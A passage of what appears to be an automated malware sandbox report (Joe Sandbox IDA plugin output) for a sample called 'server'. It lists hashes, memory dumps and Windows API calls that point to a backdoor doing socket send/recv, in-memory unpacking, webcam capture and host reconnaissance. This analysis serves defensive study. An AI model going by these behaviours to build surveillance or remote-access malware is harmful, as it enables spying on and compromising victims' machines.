                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz
                                • API String ID: 3677997916-2226868861
                                • Opcode ID: 38e8219e42e4db55c2fa6dfb5570c5b58118580aa776850d210d057bb2b41c5a
                                • Instruction ID: 35c208d4d3540590a10e284a9e24e56e80ebe8266937a50f360b862ca68792b9
                                • Opcode Fuzzy Hash: 38e8219e42e4db55c2fa6dfb5570c5b58118580aa776850d210d057bb2b41c5a
                                • Instruction Fuzzy Hash: 10F0F2B8508345BFE300DB64CD88E6BB7E9EBC8708F00CD0CF68982210E674E958CB56
                                APIs
                                • IsBadReadPtr.KERNEL32(00025AE0,00000014), ref: 0040138E
                                • LoadLibraryA.KERNEL32(?), ref: 004013AA
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00401418
                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 0040143F
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: Read$AddressLibraryLoadProc
                                • String ID:
                                • API String ID: 2438460464-0
                                • Opcode ID: 27ececaa12b5b765cc8e63b84323d5f545e4a42f36feeac29bab8f0b659a3445
                                • Instruction ID: 0e99147658626de8a4eabd926d73d9b79b83d8c6d3faf898b778abdf7a68cf47
                                • Opcode Fuzzy Hash: 27ececaa12b5b765cc8e63b84323d5f545e4a42f36feeac29bab8f0b659a3445
                                • Instruction Fuzzy Hash: 4631A6727002069BD720CF29DC40A17F7A4FF84364B16453AE91AE77B1E739E815DB94
                                APIs
                                • GetVersion.KERNEL32 ref: 00401A5F
                                  • Part of subcall function 00402F1C: HeapCreate.KERNEL32(00000000,00001000,00000000,00401A98,00000000), ref: 00402F2D
                                  • Part of subcall function 00402F1C: HeapDestroy.KERNEL32 ref: 00402F6C
                                • GetCommandLineA.KERNEL32 ref: 00401AAD
                                • GetStartupInfoA.KERNEL32(?), ref: 00401AD8
                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00401AFB
                                  • Part of subcall function 00401B54: ExitProcess.KERNEL32 ref: 00401B71
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                • String ID:
                                • API String ID: 2057626494-0
                                • Opcode ID: dc65ff5252418ed06f7e2aeaecfc8b6d2eb23304b692f99c21b4a53cfaee9d22
                                • Instruction ID: b213e8132dc8efbe91fcc638b7e301980758df8d45bd4a2f5fe3e08e305f8fc9
                                • Opcode Fuzzy Hash: dc65ff5252418ed06f7e2aeaecfc8b6d2eb23304b692f99c21b4a53cfaee9d22
                                • Instruction Fuzzy Hash: C3219CB0A40615AEDB18EFA6DD49A6E7BB8EF04704F10403FF902B72E1DB788501CB58
                                APIs
                                • ceil.MSVCRT ref: 100035DC
                                • _ftol.MSVCRT ref: 100035E5
                                • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,?,?,?,?,?,?,?,?,?,00000118), ref: 100035F9
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocVirtual_ftolceil
                                • String ID:
                                • API String ID: 3317677364-0
                                • Opcode ID: b9b9c7f959cafb60f8c472a1f707b4b1b0d8421ec6f82b85174b074a243b1b02
                                • Instruction ID: 0b1270368d2d45482b5d2b14c9809ff80a02e72387afd42c370cd588329eedd8
                                • Opcode Fuzzy Hash: b9b9c7f959cafb60f8c472a1f707b4b1b0d8421ec6f82b85174b074a243b1b02
                                • Instruction Fuzzy Hash: 8E11D2756043049BE704DF28AC8571BBBE5EBC4762F00C43EFD498B395EA76D808CA65
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: _ftolceil
                                • String ID:
                                • API String ID: 2006273141-0
                                • Opcode ID: df6a29d0820029fa79311222890b0ba528136a89e509867819a9108e4dc1c471
                                • Instruction ID: f036b2167112de69efae3a2f3866b39feb2a68a965f290d79b5dff6310f46f10
                                • Opcode Fuzzy Hash: df6a29d0820029fa79311222890b0ba528136a89e509867819a9108e4dc1c471
                                • Instruction Fuzzy Hash: 7411B4717043049FE700EF24EC8562BBBD5EB84752F00C83EFD458B385EA769818CA65
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000002,00000001,00000006,?,?,?,?,?,10002644,?), ref: 100126C4
                                • _beginthreadex.MSVCRT ref: 100126EC
                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 100126FE
                                • CloseHandle.KERNEL32(?), ref: 10012709
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateEventHandleObjectSingleWait_beginthreadex
                                • String ID:
                                • API String ID: 92035984-0
                                • Opcode ID: a791306defce20405aa908a4db8f274af4d7f10402202b8947f2bc827508db97
                                • Instruction ID: 23e376a9647dfb6a5603cf557fd056fd51601b5aa0499376741d0f3cabce9402
                                • Opcode Fuzzy Hash: a791306defce20405aa908a4db8f274af4d7f10402202b8947f2bc827508db97
                                • Instruction Fuzzy Hash: 0501DA74608351AFD300DF18CC95F2BBBE5BB88714F544A0CF598A7390D674DA048B92
                                APIs
                                • GetInputState.USER32 ref: 100027C3
                                • GetCurrentThreadId.KERNEL32 ref: 100027CF
                                • PostThreadMessageA.USER32(00000000), ref: 100027D6
                                • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 100027E7
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessageThread$CurrentInputPostState
                                • String ID:
                                • API String ID: 2517755969-0
                                • Opcode ID: 467fd943cdf485c2228c8ab07c2f3d1e6c889fb3db9b5598c51c2eda3ead2745
                                • Instruction ID: ec20eca8a2726810b7ac3bdd9eb78ebb057f1ba0a7407110d6dd7586cdd0874f
                                • Opcode Fuzzy Hash: 467fd943cdf485c2228c8ab07c2f3d1e6c889fb3db9b5598c51c2eda3ead2745
                                • Instruction Fuzzy Hash: 47D09E76680360B7F7106BA48C4EF4A3A29AB14B02F904414F705DA2E1E6F456548B66
                                APIs
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 100FA617
                                • VirtualProtect.KERNEL32(?,?,-0000002C,-00000524,?,-0000002C,00000000,-00000524), ref: 100FA786
                                Memory Dump Source
                                • Source File: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$FreeProtect
                                • String ID:
                                • API String ID: 2581862158-0
                                • Opcode ID: 0d4901908797a334fb655ef77a27580c9664ec9e80afb356d6c38425ab25cfc6
                                • Instruction ID: 6f2f89bf7d1db90bc62700e0d4ef9e05fe8b12a546338cedc59c46f9f7a7bead
                                • Opcode Fuzzy Hash: 0d4901908797a334fb655ef77a27580c9664ec9e80afb356d6c38425ab25cfc6
                                • Instruction Fuzzy Hash: 356108B6A042199FDB21CA14CC80BA9B7F1EF86350F2944A8D585DB380D771ACC2EB50
                                APIs
                                • send.WS2_32(?,00000005,?,00000000), ref: 10003FE1
                                • Sleep.KERNEL32(0000000A), ref: 1000400E
                                • send.WS2_32(?,00000005,00000000,00000000), ref: 1000402B
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: send$Sleep
                                • String ID:
                                • API String ID: 3329562092-0
                                • Opcode ID: 96077dc66876e708ef1fcc9b6368c56c91208f17216d08347fa5526f0ee46f43
                                • Instruction ID: 77b5075c0e0706e6fe537e8dad593779b6e714eb1a19249b102693e1965d96d3
                                • Opcode Fuzzy Hash: 96077dc66876e708ef1fcc9b6368c56c91208f17216d08347fa5526f0ee46f43
                                • Instruction Fuzzy Hash: 28110072A053129BE310CE558C84B0BB7E9EB84B91F01042DF259A7281CAB0DC498B92
                                APIs
                                • VirtualFree.KERNEL32(?,?,00004000,00000000,00025AE0,00000000,00000000,?,00401104,00000000,?,00000000,0040171B,?), ref: 0040126F
                                • VirtualProtect.KERNEL32(?,?,?,00000000,00000000,00025AE0,00000000,00000000,?,00401104,00000000,?,00000000,0040171B,?), ref: 004012B9
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: Virtual$FreeProtect
                                • String ID:
                                • API String ID: 2581862158-0
                                • Opcode ID: f801a129de5809b732e664a6cc53c47325ccf0b078c9723bd4da4c6216af6513
                                • Instruction ID: cfbe6bb36115d2e176d5e1e333ca34e8b356980680857497402e3289145d6506
                                • Opcode Fuzzy Hash: f801a129de5809b732e664a6cc53c47325ccf0b078c9723bd4da4c6216af6513
                                • Instruction Fuzzy Hash: E421D871A002028BD718DF44D994E7BB3AAFB84704B4542ADE902FB3A5D734FC51C7A4
                                APIs
                                • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 10003ACE
                                • recv.WS2_32(?,?,00002000,00000000), ref: 10003B02
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: recvselect
                                • String ID:
                                • API String ID: 741273618-0
                                • Opcode ID: 19576c416ae504b1cccc257a0332ddcb8846f1a110b95e4235e961779e10f328
                                • Instruction ID: 77f38b4f01034acc4ef75d27983cb47ae4e02c498766849425d2027918183be4
                                • Opcode Fuzzy Hash: 19576c416ae504b1cccc257a0332ddcb8846f1a110b95e4235e961779e10f328
                                • Instruction Fuzzy Hash: D11103323443446BE710CA68DC95BDB73D9EF853A4F004A39BB598B1D2DB74A90983A2
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,100FA084,EntryPoint), ref: 100FA580
                                • ExitProcess.KERNEL32(00000000), ref: 100FA8FB
                                Memory Dump Source
                                • Source File: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocExitProcessVirtual
                                • String ID:
                                • API String ID: 3766876677-0
                                • Opcode ID: 29cb7059c9fc364e7bf2e3c86ffc917cdf4fabc8ff533185fd67f21a229e1547
                                • Instruction ID: 4fe5e7ace49094330533e09a95d20d8f760df63a6f60646aa6e15ecdf47a5985
                                • Opcode Fuzzy Hash: 29cb7059c9fc364e7bf2e3c86ffc917cdf4fabc8ff533185fd67f21a229e1547
                                • Instruction Fuzzy Hash: E6F068B4A403199FDB628F15CD04BDA76F4EF46751F1040E5E20AAA1C1C6749DC5CF24
                                APIs
                                • HeapCreate.KERNEL32(00000000,00001000,00000000,00401A98,00000000), ref: 00402F2D
                                  • Part of subcall function 00402DD4: GetVersionExA.KERNEL32 ref: 00402DF3
                                • HeapDestroy.KERNEL32 ref: 00402F6C
                                  • Part of subcall function 00401B78: HeapAlloc.KERNEL32(00000000,00000140,00402F55,000003F8), ref: 00401B85
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: Heap$AllocCreateDestroyVersion
                                • String ID:
                                • API String ID: 2507506473-0
                                • Opcode ID: 1ae676ff0c69a4e6bd76d125cd19fc1d98bddf8f6eca4611174da9189c4adda8
                                • Instruction ID: 7f902ff39227f710822e6fdadf78228f4e262f85bb6e0f50fc68827d9ffdcbf0
                                • Opcode Fuzzy Hash: 1ae676ff0c69a4e6bd76d125cd19fc1d98bddf8f6eca4611174da9189c4adda8
                                • Instruction Fuzzy Hash: 98F03030684302A9DB206B315E0DB2636B49B14786F90443BF901E91E0EAF88586A619
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 01EA0626
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 01EA0659
                                Memory Dump Source
                                • Source File: 00000003.00000003.1381307083.0000000001EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_3_1ea0000_server.jbxd
                                Similarity
                                • API ID: Virtual$AllocFree
                                • String ID:
                                • API String ID: 2087232378-0
                                • Opcode ID: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
                                • Instruction ID: e80788f380eec0bc93a3d02c992372eefb8358d5c776cfcd6d11dad096175197
                                • Opcode Fuzzy Hash: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
                                • Instruction Fuzzy Hash: 17212B35A00219BFDB108F64CC40BEFFFF5EB58398FA08162FA50A6280E7709A119B50
                                APIs
                                • VirtualAlloc.KERNEL32(?,00000000,00001000,00000004,00000000,00025AE0,00000000,00000000,00407050,004010DB,00407050,00025AE0,00000000,?,00000000), ref: 0040119C
                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,00025AE0,00000000,00000000,00407050,004010DB,00407050,00025AE0,00000000,?,00000000), ref: 004011CB
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: a2a3c457274da8820965d6bbbe8d61300a5dc59c40c1fe27a0868a67a8417ca4
                                • Instruction ID: 1c7d8852802480053448be35edf0ca85dfca700aa98abf57b225bd8b4d40fa7f
                                • Opcode Fuzzy Hash: a2a3c457274da8820965d6bbbe8d61300a5dc59c40c1fe27a0868a67a8417ca4
                                • Instruction Fuzzy Hash: 15219571A442018FCB18CF14D894B2BBBE2FB88354F1585ADEA46DB390CB74DC85CBA0
                                APIs
                                • 6E9B1E00.AVICAP32(00000000,?,00000064,?,00000032,?), ref: 100012BE
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1222aa73b46b66728d6cd3aadffbea8403bbc66a217cf400f6dc0928efd9cc83
                                • Instruction ID: 8c5e13ae8a6d2d630b5cdf0ea91dc5de868f8d74ac694966006bdb18839bb920
                                • Opcode Fuzzy Hash: 1222aa73b46b66728d6cd3aadffbea8403bbc66a217cf400f6dc0928efd9cc83
                                • Instruction Fuzzy Hash: 29D02B3190022026F650D520AD02FDF73DC9F53B80F814138BE40D6082E9184B2E43E2
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: calloc
                                • String ID:
                                • API String ID: 2635317215-0
                                • Opcode ID: 8e9727687917e279abf897c07722a1903250bb2e9caaf9f2d8482a537b497e5c
                                • Instruction ID: 6dbe3aecfb57257a18ed92bf778f98b40f4d5830df8d968e854abdc2cc444f5c
                                • Opcode Fuzzy Hash: 8e9727687917e279abf897c07722a1903250bb2e9caaf9f2d8482a537b497e5c
                                • Instruction Fuzzy Hash: D3B012FD5042007FC908D794DC42CABB39DEFC4200F80880CBC4842201D935E804C632
                                APIs
                                  • Part of subcall function 1000A950: GetVersionExA.KERNEL32 ref: 1000A964
                                  • Part of subcall function 1000A950: wsprintfA.USER32 ref: 1000A97D
                                • wsprintfA.USER32 ref: 1000AA75
                                • RegOpenKeyExA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00000001,?), ref: 1000AA8E
                                • RegQueryValueExA.ADVAPI32 ref: 1000AAB2
                                • RegCloseKey.ADVAPI32(00000000), ref: 1000AABD
                                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,00000000), ref: 1000AB02
                                • RegQueryValueExA.ADVAPI32(?,ProcessorNameString,00000000,?,?,?), ref: 1000AB31
                                • RegCloseKey.ADVAPI32(00000000), ref: 1000AB3C
                                • wsprintfA.USER32 ref: 1000AB57
                                • GetTickCount.KERNEL32 ref: 1000AB5C
                                • wsprintfA.USER32 ref: 1000ABAC
                                • GetComputerNameA.KERNEL32(?,?), ref: 1000ABC6
                                • GetUserNameA.ADVAPI32(?,00000080), ref: 1000ABD9
                                • wsprintfA.USER32 ref: 1000ABF4
                                • GetLogicalDriveStringsA.KERNEL32(00000100,?), ref: 1000AC21
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000104,?,?,?,~MHz,00000000,00000000,?,?), ref: 1000AC7E
                                • SHGetFileInfo.SHELL32(?,00000080,?,00000160,00000410), ref: 1000AC9C
                                • lstrlen.KERNEL32(?,?,?,?,~MHz,00000000,00000000,?,?), ref: 1000ACAA
                                • lstrlen.KERNEL32(?,?,?,?,~MHz,00000000,00000000,?,?), ref: 1000ACB4
                                • GetDiskFreeSpaceExA.KERNEL32(?,?,?,00000000,?,?,?,~MHz,00000000,00000000,?,?), ref: 1000ACCD
                                • lstrlen.KERNEL32(?,?,?,?,~MHz,00000000,00000000,?,?), ref: 1000AD0A
                                • wsprintfA.USER32 ref: 1000AD2B
                                • wsprintfA.USER32 ref: 1000AD3F
                                • GlobalMemoryStatusEx.KERNEL32 ref: 1000AD90
                                • wsprintfA.USER32 ref: 1000ADB9
                                • GlobalMemoryStatusEx.KERNEL32 ref: 1000ADD8
                                • wsprintfA.USER32 ref: 1000AE01
                                • wsprintfA.USER32 ref: 1000AE79
                                • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 1000AE88
                                • wsprintfA.USER32 ref: 1000AEBE
                                • _strrev.MSVCRT ref: 1000AF02
                                • _strrev.MSVCRT ref: 1000AF1A
                                • _strrev.MSVCRT ref: 1000AF58
                                • wsprintfA.USER32 ref: 1000AFEC
                                • wsprintfA.USER32 ref: 1000AFFE
                                  • Part of subcall function 10012620: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012628
                                  • Part of subcall function 10012620: ??2@YAPAXI@Z.MSVCRT(00000128,00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012634
                                  • Part of subcall function 10012620: Process32First.KERNEL32(00000000,00000000), ref: 10012646
                                  • Part of subcall function 10012620: _strcmpi.MSVCRT ref: 10012658
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
